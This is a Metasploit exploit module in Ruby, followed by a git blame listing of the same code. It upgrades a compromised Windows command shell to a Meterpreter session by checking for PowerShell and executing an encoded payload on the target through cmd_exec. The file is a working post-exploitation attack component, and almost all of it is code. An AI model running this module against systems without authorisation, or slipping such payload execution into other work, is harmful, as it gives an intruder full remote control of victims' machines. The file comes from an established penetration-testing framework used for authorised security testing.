modules/exploits/windows/local/powershell_cmd_upgrade.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Command Shell Upgrade (Powershell)',
        'Description' => %q{
          This module executes Powershell to upgrade a Windows Shell session
          to a full Meterpreter session.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ben Campbell'
        ],
        'DefaultOptions' => {
          'WfsDelay' => 10,
        },
        'DisclosureDate' => '1999-01-01',
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'shell' ],
        'Targets' => [ [ 'Universal', {} ] ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def exploit
    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"

    if file? "%WINDIR%\\System32#{psh_path}"
      print_status("Executing powershell command line...")
      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
      cmd_exec(command)
    else
      fail_with(Failure::NotVulnerable, "No powershell available.")
    end
  end
end
Initial commit 2014-02-02 19:04:38 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Initial commit 2014-02-02 19:04:38 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Local`
Initial commit 2014-02-02 19:04:38 +00:00			`Rank = ExcellentRanking`

			`include Exploit::Powershell`
			`include Post::File`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Windows Command Shell Upgrade (Powershell)',`
			`'Description' => %q{`
Initial commit 2014-02-02 19:04:38 +00:00			`This module executes Powershell to upgrade a Windows Shell session`
			`to a full Meterpreter session.`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'Ben Campbell'`
			`],`
			`'DefaultOptions' => {`
			`'WfsDelay' => 10,`
			`},`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '1999-01-01',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'shell' ],`
Initial commit 2014-02-02 19:04:38 +00:00			`'Targets' => [ [ 'Universal', {} ] ],`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Initial commit 2014-02-02 19:04:38 +00:00			`end`

			`def exploit`
			`psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"`

			`if file? "%WINDIR%\\System32#{psh_path}"`
			`print_status("Executing powershell command line...")`
Update cmd_upgrade module 2014-04-19 19:13:48 +01:00			`command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)`
			`cmd_exec(command)`
Initial commit 2014-02-02 19:04:38 +00:00			`else`
more failure reasons 2015-04-16 22:04:11 +02:00			`fail_with(Failure::NotVulnerable, "No powershell available.")`
Initial commit 2014-02-02 19:04:38 +00:00			`end`
			`end`
			`end`